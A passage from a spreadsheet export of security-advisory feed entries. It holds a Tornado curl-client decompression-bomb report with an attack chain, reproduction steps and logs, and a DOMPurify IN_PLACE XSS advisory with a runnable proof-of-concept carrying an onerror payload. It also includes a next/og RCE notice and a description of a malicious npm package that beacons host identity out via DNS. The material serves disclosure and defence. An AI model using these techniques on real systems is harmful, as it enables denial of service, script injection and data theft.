          <t>An unbounded memory accumulation (decompression bomb) in `tornado.curl_httpclient.CurlAsyncHTTPClient` — the client-side sibling gap of CVE-2026-49855 — verified end-to-end on the 2026-08-15 master snapshot (`6.6.dev1`) and present unchanged in the latest release tag `v6.5.8` and on master (checked 2026-08-17). When a Tornado application configures the curl client (the documented deployment for proxy support / advanced TLS options) and `fetch()`es an attacker-chosen or attacker-compromised URL with default `decompress_response=True`, a malicious server replying `Content-Encoding: gzip` with a ~2.8 MB wire bomb drove the client's RSS from 30,884 kB to **1,032,100 kB (~1008 MB) in 3.18 s** (~350 MB/s, monotonic, no plateau) until the kernel OOM-killed the process (exit 137, cgroup `OOMKilled=true`) — with the transfer only 67% complete and **no client-side size check ever intervening**: `curl_httpclient.py` contains zero occurrences of `max_body_size`/`MAXFILESIZE`. The identical bomb against the default `SimpleAsyncHTTPClient` fails cleanly at ~65 MB, because every size gate CVE-2026-49855 added (compressed CL, chunked total, cumulative decompressed size — `http1connection.py:620,676,742`) lives in code the curl client never executes. This is a distinct component from the published advisory (which fixed `_GzipMessageDelegate`/`SimpleAsyncHTTPClient` only) and from the other curl-client advisories (credential handle-reuse GHSA-pw6j-qg29-8w7f, header CRLF GHSA-w235-7p84-xx57); the file's full commit history (latest 2026-06-17) shows no response-size work.
## Details
`tornado/curl_httpclient.py` (line numbers identical on master `6.6.dev1`, `v6.5.8`, and the audited snapshot):
```python
"buffer": BytesIO(),                                  # :202 — plain BytesIO, no accounting
...
else:
    write_function = buffer.write                     # :359 — every decompressed byte lands here
curl.setopt(pycurl.WRITEFUNCTION, write_function)     # :360
...
if request.decompress_response:                       # default True (HTTPRequest)
    curl.setopt(pycurl.ENCODING, "gzip,deflate")      # :373-374 — libcurl advertises + auto-decodes
```
libcurl decompresses the response **before** invoking `WRITEFUNCTION`, so the callback receives decompressed bytes, which are appended to an unbounded `BytesIO` until the transfer ends or the process dies. The only ceiling is `request_timeout` (default 20 s) — at zlib's hundreds of MB/s that still permits many GB of accumulation; the PoC raised it to 300 s and the 1 GiB cgroup cap was hit in 3.2 s regardless. There is no `pycurl.MAXFILESIZE`, no `max_buffer_size`/`max_body_size` plumbing (the constructor accepts no body-size option), and `streaming_callback` users fare no better (the callback variant at `:353-356` also performs zero accounting).
Contrast — `SimpleAsyncHTTPClient` path (`tornado/http1connection.py`), all absent from the curl path:
```python
if cast(int, content_length) &gt; self._max_body_size:        # :620  Content-Length gate
if total_size &gt; self._max_body_size:                       # :676  chunked total gate
if self._decompressed_body_size &gt; self._max_body_size:     # :742  CVE-2026-49855 decompressed gate
```
`SimpleAsyncHTTPClient.initialize()` defaults `max_buffer_size = 104857600` (100 MiB) with `max_body_size` defaulting to it (`simple_httpclient.py:117-121`); `CurlAsyncHTTPClient.initialize()` has no corresponding parameter at all.
Attack chain (attacker = malicious HTTP server; victim = any Tornado app doing `fetch()` on attacker-influenced URLs — URL fetchers, webhook processors, link previewers, RSS/probe pollers):
1. App configures `AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` (documented for proxy support; proxies are only supported with the curl client).
2. App calls `fetch("http://attacker/...")` with defaults → request advertises `Accept-Encoding: gzip,deflate`.
3. Attacker replies `200`, `Content-Encoding: gzip`, `Transfer-Encoding: chunked`, body = a gzip stream of zeros (4,174,525 wire bytes expanding to 4 GiB, 1029:1, sent in 64 KB chunks).
4. libcurl auto-decodes at ~350 MB/s into `buffer.write` with no size accounting → process RSS climbs linearly until OOM. The response need not complete: the client died with 2,818,048/4,174,525 wire bytes delivered (67%).
Variant without compression: `decompress_response=False` plus an endless streaming body (no Content-Length, no final chunk) feeds the same unaccounted `buffer.write` — this client never enforces any cap on any path.
## PoC
Verified end-to-end 2026-08-15 in a single container (cgroup `--memory 1g --memory-swap 1g` so the exhaustion endpoint is safe and fast to observe), two processes over a real TCP socket on `127.0.0.1:8081`: a raw-socket malicious server (`evil_server.py`, builds the 4 GiB-of-zeros gzip bomb once, serves it with chunked framing) and the Tornado victim (`victim_curl.py`, configures `CurlAsyncHTTPClient`, `fetch(..., request_timeout=300)`, samples `/proc/self/status` VmRSS every 0.2 s from a monitor thread so the curve survives the OOM kill).
### Build &amp; run the victim
```bash
git clone https://github.com/tornadoweb/tornado
cd tornado
pip install pycurl
python evil_server.py &amp;     # 127.0.0.1:8081; prints BOMB_BUILT wire_bytes=... ratio=... EVIL_LISTENING
python victim_curl.py       # victim: CurlAsyncHTTPClient fetch -&gt; expect linear RSS rise -&gt; OOM
python victim_simple.py     # control: default SimpleAsyncHTTPClient on the same bomb
```
Verified environment: debian:bookworm-slim, Python 3.11.2, python3-pycurl 7.45.2 (libcurl 7.88.1, zlib 1.2.13), tornado master snapshot `6.6.dev1` of 2026-08-15 run from the source tree (`sys.path`), container memory capped at 1 GiB. `curl_httpclient.py` verified byte-equivalent (still zero size-limit references) in tag `v6.5.8` and on master as of 2026-08-17.
### Reproduction steps
1. **Precondition — the documented curl-client deployment fetching a remote URL.** The vulnerability requires the application to use `CurlAsyncHTTPClient` (the standard configuration when proxy support or advanced TLS options are needed) with default `decompress_response=True`, and to fetch a URL whose server the attacker controls or has compromised. `victim_curl.py` implements exactly that (`AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` → `fetch()`), and the server log confirms the ENCODING path engaged — the victim's request arrived with `User-Agent: Mozilla/5.0 (compatible; pycurl)` and `Accept-Encoding: gzip,deflate`.
2. **Attack:** start `evil_server.py`, wait for `EVIL_LISTENING`, then run `victim_curl.py` (the fetch itself is the attack; no further interaction).
3. **Expected:** `victim_curl_rss.log` shows VmRSS 30,884 → 1,032,100 kB over 3.18 s, rising ~350 MB/s with no plateau; the container kills the victim (`exit 137`, docker `OOMKilled=true`); the server logs `CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525` — the accumulation is bounded only by available memory, never by a client-side check, and the 4 GiB payload was never fully delivered.
4. **Variant:** with `decompress_response=False` and an unterminated chunked body (server keeps sending forever), the same `buffer.write` path accumulates unbounded plain bytes — no compression needed; `request_timeout` only extends the ceiling.
5. **Control:** `victim_simple.py` fetches the identical bomb with the default `SimpleAsyncHTTPClient` → clean `FETCH_FAILED: HTTP 599: Connection closed`, RSS peak ~65 MB (24,984 → 66,712 kB), script exit 0 — the CVE-2026-49855 accounting in `http1connection.py` aborts the transfer, proving the gap is specific to the curl client.
### PoC source
Full PoC source (**victim_curl.py**, stdlib only, no dependencies): [victim_curl.py](https://gist.github.com/afldl/211c0e7af8175c2eabab53ed037c435d) (secret gist, unlisted).
The gist carries `evil_server.py` (bomb server), `victim_curl.py` (victim), `victim_simple.py` (control), and `REPRODUCE.md`.
### Captured output (2026-08-15 run, verbatim excerpts)
```
evil_server.log:
BOMB_BUILT wire_bytes=4174525 decompressed_bytes=4294967296 ratio=1029:1
EVIL_LISTENING 127.0.0.1:8081
REQUEST_FROM 127.0.0.1:57544 -&gt; GET /bomb HTTP/1.1
REQUEST_HEADERS:
GET /bomb HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
WIRE_SENT 65536/4174525
WIRE_SENT 2162688/4174525
CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525 err=ConnectionResetError(104, 'Connection reset by peer')
victim_curl_rss.log (VmRSS kB, every 0.2 s):
0.00  30884
0.61  231848
1.41  514720
2.22  794480
2.82 1000756
3.18 1032100        &lt;- last sample before kill
driver_f1.log:
timeout 240 python3 /e2e/F1/victim_curl.py ...  606 Killed
VICTIM_CURL_EXIT=137         # docker inspect -&gt; OomKilled: true
victim_simple.log (control, same bomb):
FETCH_FAILED: HTTP 599: Connection closed
SCRIPT_FINISHED_NORMALLY     # exit 0, VmRSS peak 66712 kB
```
Honest framing of the endpoint: the OOM kill at ~1008 MB was forced by the test's 1 GiB cgroup cap as the observation instrument; the "unbounded" claim rests on the linear no-plateau RSS curve, death at 67% wire delivery, and the absence of any size accounting in the code path — with more memory the transfer would have continued to the full 4 GiB payload.
## Impact
Denial of service (memory exhaustion) of any Tornado application that uses the curl HTTP client and fetches attacker-influenced URLs. A single ~4 MB response kills a 1 GiB process in ~3 s; wire cost scales as `available_memory / 1000`. Because the accumulation happens on the shared event loop's client, one malicious response takes down the entire application (all concurrently served users), and a slow endless-body variant drains memory gradually below detection thresholds. The attack requires no privileges, no user interaction, and only that the victim's configured client visits the attacker's origin.
### Suggested fix
Enforce a byte budget in the write path of `CurlAsyncHTTPClient`: wrap the `WRITEFUNCTION` (both the `buffer.write` branch and the `streaming_callback` branch) in a counter that aborts the transfer (`curl.setopt(pycurl.FAILONERROR)`-style cancellation or raising from the callback) once the received total exceeds `max_body_size`, plumbed from `initialize()` with the same 100 MiB default as `SimpleAsyncHTTPClient`. Because libcurl decompresses before the write callback, the counter naturally measures *decompressed* bytes — the same semantics as the CVE-2026-49855 fix. (`pycurl.MAXFILESIZE` alone is insufficient: it applies to the compressed transfer size.)
### Affected versions
- **&lt;= 6.5.8** (latest tag; the curl client has never had a response-size limit) and master (`6.6.dev1`, verified 2026-08-15/17).
- 6.5.6's CVE-2026-49855 fix covered `SimpleAsyncHTTPClient`/`http1connection.py` only; `curl_httpclient.py` was not touched.
## Credit
Reported by the diff/ambidiff security research effort (afldl).</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
      <c r="D230" s="5" t="inlineStr"/>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr">
        <is>
          <t>npm:dompurify</t>
        </is>
      </c>
      <c r="M230" s="5" t="inlineStr">
        <is>
          <t>3.4.16</t>
        </is>
      </c>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr"/>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>## Summary
In `IN_PLACE` mode DOMPurify sanitizes the caller's live DOM subtree directly. To close a known hazard (GHSA-55q2-fjhq-7xh7), the library neutralizes any node a hook detaches during sanitization by stripping its subtree's non-allow-listed attributes, but this neutralization is wired only into the `beforeSanitizeElements` and `uponSanitizeElement` hook sites. An `afterSanitizeElements` or `afterSanitizeAttributes` hook that removes a non-root element (a documented, supported pattern) detaches that element's subtree with no neutralization, so descendant `on*` handlers remain armed on the caller's live tree after `sanitize()` returns, yielding DOM XSS. No special privilege is required beyond supplying markup to an application that uses `IN_PLACE` together with a node-removing afterSanitize hook.
## Root Cause
`IN_PLACE` sanitization mutates the caller's live document, so any element a hook detaches from that tree must have its subtree neutralized before `sanitize()` returns; otherwise a queued resource-event handler (for example an `&lt;img onerror&gt;` that began loading when the caller built the tree) fires in page scope even though the handler never reached the sanitized output. The guard helper `_handleHookDetachedNode` (which calls `_neutralizeSubtree` in `IN_PLACE`) is invoked only after `beforeSanitizeElements` and after `uponSanitizeElement`. It is never invoked from the afterSanitize return paths, and `_sanitizeAttributes` never calls it at all. The post-walk `IN_PLACE` neutralization pass iterates only `DOMPurify.removed`, and hook-detached nodes are intentionally not recorded there, so that pass cannot reach them either.
```text
src/purify.ts
  _sanitizeElements: _handleHookDetachedNode present at lines 2142 and 2175
    (before/upon), absent after afterSanitizeElements at lines 2208 and 2249.
  _sanitizeAttributes: afterSanitizeAttributes fires at line 2670 with no
    detach re-check; the function never calls _handleHookDetachedNode.
  Post-walk IN_PLACE pass (lines 3081-3090) iterates DOMPurify.removed only,
    which by design (comment at lines 2096-2099) excludes hook-detached nodes.
```
## Impact
An attacker who supplies markup processed by a victim application that runs `DOMPurify.sanitize(node, { IN_PLACE: true })` and registers a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook can retain arbitrary `on*` event handlers on descendants of a removed non-root element. Because `IN_PLACE` operates on the caller's live document, a queued resource-event handler on such a descendant fires in the page origin after the synchronous `sanitize()` call returns, giving script execution in the victim's session (DOM XSS). This defeats DOMPurify's `IN_PLACE` contract to neutralize handlers on subtrees removed from the live tree. The capability is script execution in the victim origin; exact confidentiality and integrity effects depend on the hosting application's session.
## Proof of Concept
```text
Dependencies: Node.js and jsdom. The harness builds a live tree, registers a
removal hook, runs IN_PLACE sanitize(), then inspects whether the attacker
onerror handler survives on the detached descendant. jsdom does not perform
real image loads, so the retained handler (rather than an actual fired event)
is the observed hazard; the retained on* attribute on a live detached node
after a synchronous sanitize() return is the neutralization failure.
```
Reproduction steps:
1. Build a live subtree `#root &gt; section#wrap &gt; img[onerror]` where `#root` is the walk root and `section#wrap` is a non-root wrapper.
2. Register an `afterSanitizeElements` (or `afterSanitizeAttributes`) hook that calls `node.remove()` on the wrapper.
3. Call `DOMPurify.sanitize(root, { IN_PLACE: true })`.
4. Observe that the descendant `&lt;img&gt;` retains its `onerror` handler, whereas the same removal performed in a `beforeSanitizeElements`/`uponSanitizeElement` hook strips it.
```javascript
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');
const { window } = new JSDOM('&lt;!DOCTYPE html&gt;&lt;body&gt;&lt;/body&gt;');
const DOMPurify = createDOMPurify(window);
const root = window.document.createElement('div');
root.id = 'root';
root.innerHTML = '&lt;section id="wrap"&gt;&lt;img src="x" onerror="ATTACKER()"&gt;&lt;/section&gt;';
window.document.body.appendChild(root);
DOMPurify.addHook('afterSanitizeElements', (node) =&gt; {
  if (node.id === 'wrap') node.remove();
});
DOMPurify.sanitize(root, { IN_PLACE: true });
// The detached &lt;img&gt; still carries its onerror handler:
console.log(root.querySelector('#wrap') === null,               // true (removed from live tree)
            !!window.document.querySelector('img[onerror]') ||  // handler survives on the detached node
            root.innerHTML);
```
```text
PASS: beforeSanitizeElements detach neutralizes descendant onerror (control)
PASS: uponSanitizeElement detach neutralizes descendant onerror (control)
PASS: without a removal hook the descendant onerror is stripped normally
PASS: afterSanitizeElements detach LEAVES descendant onerror armed (GAP)
PASS: afterSanitizeAttributes detach LEAVES descendant onerror armed (GAP)
PASS: kept custom element removed in afterSanitizeElements leaves descendant onerror armed (GAP)
```
## Attack Chain
1. **Exposure:** The victim application calls `DOMPurify.sanitize(liveNode, { IN_PLACE: true })` on attacker-influenced markup and has registered a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook per an application policy (`src/purify.ts:3026` walk, `2136` element pass, `2522` attribute pass).
2. **Control:** The attacker controls the markup, including a non-root wrapper element and, inside it, a descendant carrying an `on*` resource-event handler such as `&lt;img src=x onerror=...&gt;`.
3. **Path:** The pre-order walk visits the wrapper before its descendants. During the wrapper's element or attribute pass the application hook detaches the wrapper from the live tree.
4. **Guard:** The detach-neutralization guard `_handleHookDetachedNode` runs only after `beforeSanitizeElements` (`2142`) and `uponSanitizeElement` (`2175`); it is absent after `afterSanitizeElements` (`2208`, `2249`) and is never called by `_sanitizeAttributes` (afterSanitizeAttributes at `2670`). The NodeIterator advances past the detached subtree, so the descendants are never revisited, and the post-walk pass iterates only `DOMPurify.removed`, which excludes hook-detached nodes.
5. **Primitive:** The descendant retains its `on*` handler on the caller's live document after `sanitize()` returns.
6. **Result:** The queued resource event fires the attacker handler in the victim page origin, achieving DOM XSS despite `IN_PLACE` sanitization.
## Bypass Evidence
The relevant prior fix is GHSA-55q2-fjhq-7xh7 ("IN_PLACE hook removal leaves a detached subtree executable, causing XSS"), whose change (`#1557`) added `_neutralizeSubtree` at the `beforeSanitizeElements` and `uponSanitizeElement` detach sites. Inspection of that change shows it touches no afterSanitize site: the diff adds the neutralization only at the before/upon locations, later refactored into `_handleHookDetachedNode` at `src/purify.ts:2142` and `2175`. A subsequent hardening change (`#1616`) added a `rootWasRemoved` throw and a neutralization sweep over `DOMPurify.removed`, but that sweep still iterates only `DOMPurify.removed`, which by design excludes hook-detached non-root nodes, so it does not close this gap. The `afterSanitizeElements`-on-kept-custom-element site at `2208` was itself introduced by the fix for GHSA-c2j3-45gr-mqc4 (`#1527`), adding another uncovered hook site.
Disproof attempts, all failed: (a) that a later release closed the afterSanitize gap, refuted by inspecting the published 3.4.13, 3.4.14, and 3.4.15 artifacts; (b) that detached descendants are revisited or re-sanitized, refuted at runtime (the `onerror` is retained only at the afterSanitize sites and stripped at the before/upon sites and with no removal hook); (c) that the post-walk pass catches hook-detached nodes, refuted by the design that excludes them from `DOMPurify.removed`; (d) that the precondition is contrived, refuted by parity with the accepted GHSA-55q2 threat model and the library's own supported pattern of removing a node inside `afterSanitizeElements`. The only edge not directly executed is the browser resource-event dispatch (jsdom performs no real image load); it is established by the proven retention of the live handler after a synchronous return, the library's own comments describing exactly this hazard, and parity with the accepted GHSA-55q2 mechanism.
## Affected Versions
- `Ecosystem: npm`
- `Package: dompurify`
- `Confirmed affected range: &gt;= 3.4.13, &lt;= 3.4.15`
- `Latest release checked: 3.4.15 (npm registry)`
- `Fix status: fixed in 3.4.16`
The before/upon detach neutralization introduced for GHSA-55q2-fjhq-7xh7 first shipped in 3.4.13; the residual afterSanitize gap was verified by reproducing it against the published npm artifacts for 3.4.13, 3.4.14, and 3.4.15. The 3.4.12 artifact predates that neutralization and behaves differently at the before/upon sites, so it is outside this specific incomplete-fix range. No release through 3.4.15 neutralizes detached subtrees at the afterSanitize sites, so no fixed version is established.
## Suggested Fix
Enforce the same `IN_PLACE` detach-neutralization invariant at every hook site that can detach a node, not only the before/upon sites. Concretely, apply a `_handleHookDetachedNode(currentNode, root)` re-check after `afterSanitizeElements` at both `src/purify.ts:2208` and `2249` (returning as removed when the node was detached), and add an equivalent `IN_PLACE` detach check plus `_neutralizeSubtree` after `afterSanitizeAttributes` at `2670`. As an interim mitigation without a code change, applications using `IN_PLACE` can avoid removing nodes inside `afterSanitizeElements`/`afterSanitizeAttributes` hooks and instead perform such removals in `beforeSanitizeElements`/`uponSanitizeElement`, or avoid `IN_PLACE` for attacker-influenced content.
Reported by zx (GitHub: @manus-pi).</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
      <c r="D231" s="5" t="inlineStr"/>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M231" s="5" t="inlineStr">
        <is>
          <t>16.3.6</t>
        </is>
      </c>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr"/>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>## Impact
The Node.js `ImageResponse` implementation from `next/og` is affected by an upstream vulnerability. This can lead to remote code execution.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation:
```tsx
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
  const value = new URL(request.url).searchParams.get('value') ?? ''
  return new ImageResponse(
    &lt;svg width="1200" height="630"&gt;
      &lt;title&gt;{value}&lt;/title&gt;
    &lt;/svg&gt;
  )
}
```
Applications using the Edge `ImageResponse` implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected.
## Workaround
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js `ImageResponse` implementation from `next/og`.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17339</t>
        </is>
      </c>
      <c r="D232" s="5" t="inlineStr"/>
      <c r="E232" s="5" t="inlineStr"/>
      <c r="F232" s="5" t="inlineStr"/>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr">
        <is>
          <t>npm:reactjs-risk</t>
        </is>
      </c>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr"/>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0e58c82916c5199ef9e73a5d70f91d120312151eb5c28090d8bbf6dbf4117543)
The package's preinstall lifecycle script collects host identity metadata from the installer machine — os.hostname(), the output of `whoami`/os.userInfo().username, and os.platform() — hex-encodes the values, and issues a DNS A-record lookup for `&lt;hex&gt;.768hgkqn53abdemu8ikzkel4g.canarytokens.com`, causing the installer's hostname, username, and platform to be transmitted to the canarytoken operator on every `npm install`. The dns module is loaded via string concatenation (`'d'+'n'+'s'`) and the `whoami` command is similarly split, indicating deliberate obfuscation of the module and command names. The package's declared main entry is an empty stub with no library functionality, so the preinstall beacon is the package's only behavior. Installing this package auto-executes an unauthenticated exfiltration of installer identity metadata to a third-party DNS endpoint the installer did not opt into.
## Source: ossf-package-analysis (a32a318956967c92b753750e0b607e48db7eef07d05f25c2b687f3b9612f806e)
The OpenSSF Package Analysis project identified 'reactjs-risk' @ 99.17.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17339</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17340</t>
        </is>
      </c>
      <c r="D233" s="5" t="inlineStr"/>
      <c r="E233" s="5" t="inlineStr"/>
      <c r="F233" s="5" t="inlineStr"/>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr">
        <is>
          <t>npm:@astracode/byles-new</t>
        </is>
      </c>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr"/>
      <c r="S23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@astracode/byles-new (npm), version(s): 0.1.37, 0.1.36, 0.1.35, 0.1.3, 0.0.99, 0.1.2, 0.1.1, 0.1.0.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17340</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17341</t>
        </is>
      </c>
      <c r="D234" s="5" t="inlineStr"/>
      <c r="E234" s="5" t="inlineStr"/>
      <c r="F234" s="5" t="inlineStr"/>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr">
        <is>
          <t>npm:@badzz88/baileys</t>
        </is>
      </c>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr"/>
      <c r="S23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@badzz88/baileys (npm), version(s): 8.5.9, 8.5.7, 8.5.5, 8.5.4, 8.5.3, 8.5.2, 8.5.1.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17341</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17342</t>
        </is>
      </c>
      <c r="D235" s="5" t="inlineStr"/>
      <c r="E235" s="5" t="inlineStr"/>
      <c r="F235" s="5" t="inlineStr"/>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/belbails</t>
        </is>
      </c>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr"/>
      <c r="S23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@bellaxchuu/belbails (npm), version(s): 1.0.1.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17342</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D236" s="5" t="inlineStr"/>
      <c r="E236" s="5" t="inlineStr"/>
      <c r="F236" s="5" t="inlineStr"/>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
